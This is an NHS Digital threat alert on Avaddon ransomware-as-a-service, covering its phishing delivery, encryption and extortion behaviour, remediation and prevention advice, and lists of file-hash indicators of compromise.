Avaddon Ransomware

Avaddon was first observed in February 2020 and is a RaaS tool which is delivered through phishing campaigns. The group behind it use Avvadon to both steal and encrypt files in double extortion attacks, posting the stolen information on a leak site.

Threat ID:: CC-3833
Category:: Ransomware
Threat Severity:: Medium
Threat Vector:: Phishing
Published:: 29 April 2021 11:23 AM

Report a cyber attack: call 0300 303 5222 or email [email protected]

Summary

Affected platforms

The following platforms are known to be affected:

Versions: all supported

Microsoft Windows

Threat details

Introduction

First observed in February 2020, Avaddon is a ransomware-as-a-service (RaaS) tool targeting organisations globally. In June 2020, Avaddon added the option to launch payloads via PowerShell, and in January 2021 it added the ability to perform distributed denial-of service (DDoS) attacks to it's arsenal.

Delivery

Avaddon is typically delivered via phishing emails which employ obfuscation techniques. These emails have JPEG or zipped file attachments, which themselves contain a preliminary downloader in a .js payload. Once run, the downloader detects whether the user is located in any member nations of the Commonwealth of Independent States (CIS) by checking the operating system language and keyboard layout. If either of these returns Russian or Ukrainian, it will terminate itself. The downloader use embedded versions of two Microsoft tools, PowerShell and BITS, to download and Avaddon payload from a command and control server and execute it.

Some Avaddon campaigns use exposed Remote Desktop Service connections to directly deliver Avaddon payloads to target systems.

Activities

Once delivered, Avaddon will generate new Windows services and schedule tasks to ensure persistence, before terminating any processes that may seek to keep files in use. If successful it will disable system recovery services and delete any backups. All reachable non-system files are then encrypted using an AES-256 implementation, with a particular focus on files and directories associated with Microsoft Exchange. Encrypted files are then appended with a user-specific string, ensuring each attack is unique.

The group operating Avaddon will also attempt to extract sensitive files during Avaddon's preparation phases. These files are then used to coerce affected organisations into paying their ransom demands. The group will also threaten organisations with targeted DDoS attacks as another means to coerce payment.

Remediation advice

If a device on your network becomes infected with ransomware it will begin encrypting files, which may also include remote files on network locations. The only guaranteed way to recover from a ransomware infection is to restore all affected files from their most recent backup. To limit the impact of a ransomware infection, NHS Digital advises that:

Critical data is frequently saved in multiple backup locations.
At least one backup is kept offline at any time (separated from live systems).
Backups and incident recovery plans are tested to ensure that data can be restored when needed.
User account permissions for modifying data are regularly reviewed and restricted to the minimum necessary.
Infected systems are disconnected from the network and powered down as soon as practicable.
Any user account credentials that may have been compromised should be reset on a clean device
Where infected systems cannot be quarantined with confidence, then an affected organisation should disconnect from national networks to limit propagation.

Additionally, to prevent and detect an infection, NHS Digital advises that:

Secure configurations are applied to all devices.
Security updates are applied at the earliest opportunity.
Tamper protection settings in security products are enabled where available.
Obsolete platforms are segregated from the rest of the network.
IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
Administrative accounts are only used for necessary purposes.
Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.

Indicators of compromise

Host Indicators

SHA1 hashes

35831310fa4f11909c44b5db64c44b1064ac1d35
3b575420ceea4203152041be00dc80519d1532b5
40e0fff64ba685d97fe143880a7b01c0137b4ceb
48385b39f2ad900377aba7442d93663506c2b9c5
4915feb5b5cccd9e75f0bd4af5e35211353a207e
5ddb793327e1e89ef8f406be11f97e5489f7a5c1
60ab0dd2ef31cfb96d52fa0a429c3803417db5c2
6a6956aff077aeda5b22873cfb891632fbce6bc7
7e835d1813f2eaf82c5e38eebf3bfd06ed6513e0
880e40932e56e0aa0b0ad8c413b50fca7d771bbe
9087d7b5f8b62a2afa4f229b7e254971d4d9b5c3
a1d6461e833813ccfb77a6929de43ab5383dbb98
a37a3b88a15d31a8951243cd6f3f08149244a67d
c0fc01350ae774f3817d71710d9a6e9adaba441f
c1f6f1e1a27e7be32a3f18440c05951fa7e52eb9
c41d5b04b8219df57249ecdba8faa97c3d4a7fc2
cf5920569b7d802763463b2faf4bbd2cdc21cfad
d680d790167a7f84f7e531b2d16db0a0e3359f73
dd2cce7e2f5dcf0a00e4ec9cdbc028476ceb3583
f540a1f2fdc0670e1a7a3d55e335e70ebe3089f7
f94fda611b71bd565c1d603864e21e9cfd3ca99e
fc12d7ad112ddabfcd8f82f290d84e637a4d62f8

SHA256 hashes

0a052eff71641ff91897af5bdecb4a98ed3cb32bcb6ff86c4396b1e3ceee0184
0ff4058f709d278ed662719b9627618c48e7a656c59f6bfecda9081c7cbd742b
146e554f0d56db9a88224cd6921744fdfe1f8ee4a9e3ac79711f9ab15f9d3c7f
165c5c883fd4fd36758bcba6baf2faffb77d2f4872ffd5ee918a16f91de5a8a8
28adb5fa487a7d726b8bad629736641aadbdacca5e4f417acc791d0e853924a7
2946ef53c8fec94dcdf9d3a1afc077ee9a3869eacb0879cb082ee0ce3de6a2e7
29b5a12cda22a30533e22620ae89c4a36c9235714f4bad2e3944c38acb3c5eee
331177ca9c2bf0c6ac4acd5d2d40c77991bb5edb6e546913528b1665d8b501f3
46a8c1e768f632d69d06bfbd93932d102965c9e3f7c37d4a92e30aaeca905675
5252cc9dd3a35f392cc50b298de47838298128f4a1924f9eb0756039ce1e4fa2
61126de1b795b976f3ac878f48e88fa77a87d7308ba57c7642b9e1068403a496
64cfe726643c7783b0f13a2927ab330e35e94a9125122b0cc230eec2bea27dd1
6884d700284bc3158dbeb8745bcda3e3b17b69ad049528b125b36e2455bb6b27
6a4875ddaceaa91fb3369f0f6d962f77442daf1b1d97733457d12bcabdf79441
8d14c0c8faf6249b67a1d19b7bd1404eb416304d8f5c73b3bdc9c69367e829de
98388773dc5da7f73a32a08613404029c7cd23078d697700aec6b573b2fa8e09
a5e4cb2f47de005570110b7f3ef1f4b600894469d0561b7e5653671a484a913b
caf57646723fe7c34f89618d96af3c2b82816f5d995fd7b951f32571166d3768
dab7eb2503e0d61d02e6156a47361da97afc53c1dee17c420a0a05de891172c3
de48c7d7f4865099dba96b6e2c6dca54187fb64e07c319660f072b851ec8b3b3
f9b748cf35278dc4bfaa2127ca1d6016fafbeb768b1a09c7ab58560632dbd637
fa4bc4a1dd461ecaadd094a9a21668ecdbb60022fb1b088854a8d13c09155a5c

Last edited: 29 April 2021 3:34 pm